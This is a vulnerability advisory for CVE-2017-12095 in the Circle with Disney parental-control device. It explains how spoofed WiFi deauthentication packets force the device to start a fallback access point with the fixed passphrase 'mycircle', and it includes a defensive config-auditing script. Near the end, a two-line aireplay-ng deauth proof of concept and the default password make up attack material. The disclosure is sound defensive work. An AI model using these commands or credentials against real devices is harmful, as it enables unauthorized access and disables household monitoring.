CVE-2017-12095
An exploitable vulnerability exists in the WiFi Access Point feature of Circle with Disney running firmware 2.0.1. A series of WiFi packets can force Circle to setup an Access Point with default credentials. An attacker needs to send a series of spoofed “de-auth” packets to trigger this vulnerability.
Circle with Disney 2.0.1
6.5 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-284: Improper Access Control
Circle with Disney is a network device used to monitor internet use of children on a given network.
Circle can connect to a home network either via WiFi or wired connection. When no cable connection is possible, Circle will switch to WiFi, which was set-up during the initial configuration.
When connected via WiFi, the main function in the configd binary continuously checks for network connectivity by calling sub_40A55C.
This function verifies that the interface is associated with the Access Point and that it has an IP address assigned. If any of these checks aren’t satisfied, the return value will be 0, meaning there’s no available connection.
Back in the main function, when there’s no connection, function sub_40A2A0 will be called with the argument “Internet connection down”. At a high level, the function works as follows:
from os import system

def circle_ap(status):
    # Pseudocode reconstruction of sub_40A2A0: status is either "paired" or a
    # reason string such as "Internet connection down".
    print("setting Wifi Status to %s" % status)
    if status == "paired":
        # Paired again: tear the fallback Access Point down after 30 seconds.
        system("circle_ap.sh down 30 &")
    else:
        # Any other status: bring the fallback Access Point up.
        system("circle_ap.sh up &")  # [1]
At [1] the circle_ap.sh script is called to start an Access Point. The contents of the script are the following:
#!/bin/sh
CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
case $# in
    2)
        sleep $2
        ;;
esac
case "$1" in
    up)
        ps | grep [h]ostapd && ifconfig ra0 | grep UP && exit 0
        killall hostapd;
        ifconfig eth0 0.0.0.0
        ifconfig ra0 10.123.234.1 netmask 255.255.255.0 up
        hostapd -B /tmp/hostapd.conf # [2]
        $CIRCLE_ROOT/scripts/refresh_hosts.sh ap
        ;;
    down)
        killall hostapd;
        ifconfig ra0 10.123.234.1 netmask 255.255.255.0 down;
        ;;
    *)
        echo -n "usage: circle_ap <up/down> <optional delay>"
        exit 1
esac
exit 0
At [2] hostapd is used to bring up an Access Point using the configuration below.
# grep -e ssid -e wpa /tmp/hostapd.conf
ssid=Circle-1234
wpa=3
wpa_passphrase=mycircle
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_group_rekey=600
The SSID used is “Circle-” followed by the last two hex digits of the MAC address. The “wpa_passphrase” parameter is fixed.
Indeed, the base hostapd.conf file is copied from /mnt/shares/usr/bin/scripts/hostapd.conf during boot time by the startcircle script. The only modification applied is the SSID name.
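As an added example that is not part of the advisory or of Circle’s own code, the following Python audits a hostapd configuration for the properties that make this fallback Access Point joinable with known credentials, and contrasts the quoted configuration with a hardened variant. The known-default list, the hardened configuration and the 16-character minimum passphrase length are assumptions made for the example.

```python
# Audit a hostapd.conf of the kind Circle writes to /tmp/hostapd.conf and
# report settings that let anyone join the fallback Access Point.

# Constructed reproduction of the relevant lines quoted in the advisory.
CIRCLE_HOSTAPD_CONF = """\
ssid=Circle-1234
wpa=3
wpa_passphrase=mycircle
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_group_rekey=600
"""

# Hypothetical hardened variant: WPA2/CCMP only and a passphrase that is
# provisioned per device at first boot (placeholder value, not a real secret).
HARDENED_CONF = """\
ssid=Circle-1234
wpa=2
wpa_passphrase=PLACEHOLDER-per-device-secret
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=600
"""

KNOWN_DEFAULT_PASSPHRASES = {"mycircle"}  # value quoted in the advisory
MIN_PASSPHRASE_LEN = 16                   # assumed local policy


def parse_hostapd_conf(text):
    """Parse key=value lines; blank lines and comments are skipped, later keys win."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd_conf(text):
    """Return a list of findings (empty list means nothing flagged)."""
    conf = parse_hostapd_conf(text)
    findings = []
    passphrase = conf.get("wpa_passphrase", "")
    if passphrase in KNOWN_DEFAULT_PASSPHRASES:
        findings.append("default passphrase")
    elif len(passphrase) < MIN_PASSPHRASE_LEN:
        findings.append("short passphrase")
    if conf.get("wpa", "0") in ("0", "1", "3"):
        findings.append("open or WPA1 allowed")
    if "TKIP" in conf.get("wpa_pairwise", "").split():
        findings.append("TKIP allowed")
    return findings
```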
This feature allows an attacker to connect to a Circle Access Point after forcing it out of its legitimate WiFi network. The device will continue to function but won’t be able to apply any filtering over the original network. Moreover, this allows an attacker to conduct further attacks against the device that may be possible only from a common subnetwork.
As an example, this vulnerability would allow an external attacker to apply TALOS-2017-0396 and TALOS-2017-0371 to completely compromise the device.
The following proof of concept shows how to make the device disconnect from its legitimate WiFi network and start its own Access Point, by sending a series of “deauth” packets.
$ airmon-ng start wlan0 1
$ aireplay-ng --deauth 10000 -a $WIFI_ROUTER_MAC -c $CIRCLE_MAC mon0
After a new Access Point is detected with a name starting with “Circle-”, it’s possible to connect to it using the password “mycircle”.
2017-09-20 - Vendor Disclosure
2018-03-29 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt of Cisco Talos.